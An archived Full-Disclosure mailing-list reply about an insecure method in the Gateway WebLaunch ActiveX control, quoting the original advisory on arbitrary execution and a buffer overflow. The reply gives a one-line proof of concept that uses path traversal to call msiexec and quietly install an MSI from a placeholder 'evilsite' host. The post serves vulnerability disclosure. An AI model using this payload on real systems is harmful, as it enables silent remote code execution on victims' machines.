Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18830
HistoryJan 09, 2008 - 12:00 a.m.

Re: [Full-disclosure] Gateway WebLaunch ActiveX Control Insecure Method

2008-01-0900:00:00
vulners.com
12

I was playing with this a bit more. Everybody has the Windows
Installer installed, right? How about this:

obj.DoWebLaunch("","…\\…\\…\\…\\windows\\system32\\msiexec.exe",
"","/i http://www.evilsite.com/evilapp.msi /quiet");

Elazar

On Tue, 08 Jan 2008 20:08:53 -0500 [email protected] wrote:
>The DoWebLaunch() method of the Gateway WebLauncher ActiveX
>control
>allows for the execution or arbitrary application on a system,
>additionally this method is vulnerable to a buffer overflow in the
>
>2nd and 4th parameters. Both weblaunch.ocx and weblaunch2.ocx
>allow
>the execution of arbitrary files, weblaunch.ocx is vulnerable to
>the above mentioned buffer overflow, I have not checked
>weblaunch2.ocx. Exploit: http://www.milw0rm.com/exploits/4869
>
>Elazar
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html


Click for free information and quotes for interest only loans.
http://tagline.hushmail.com/fc/Ioyw6h4dQLTWDiGHz23XbuHRjFjoKIh931B6M5EFWM7GG2w6BuCtD6/
>Hosted and sponsored by Secunia - http://secunia.com/


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/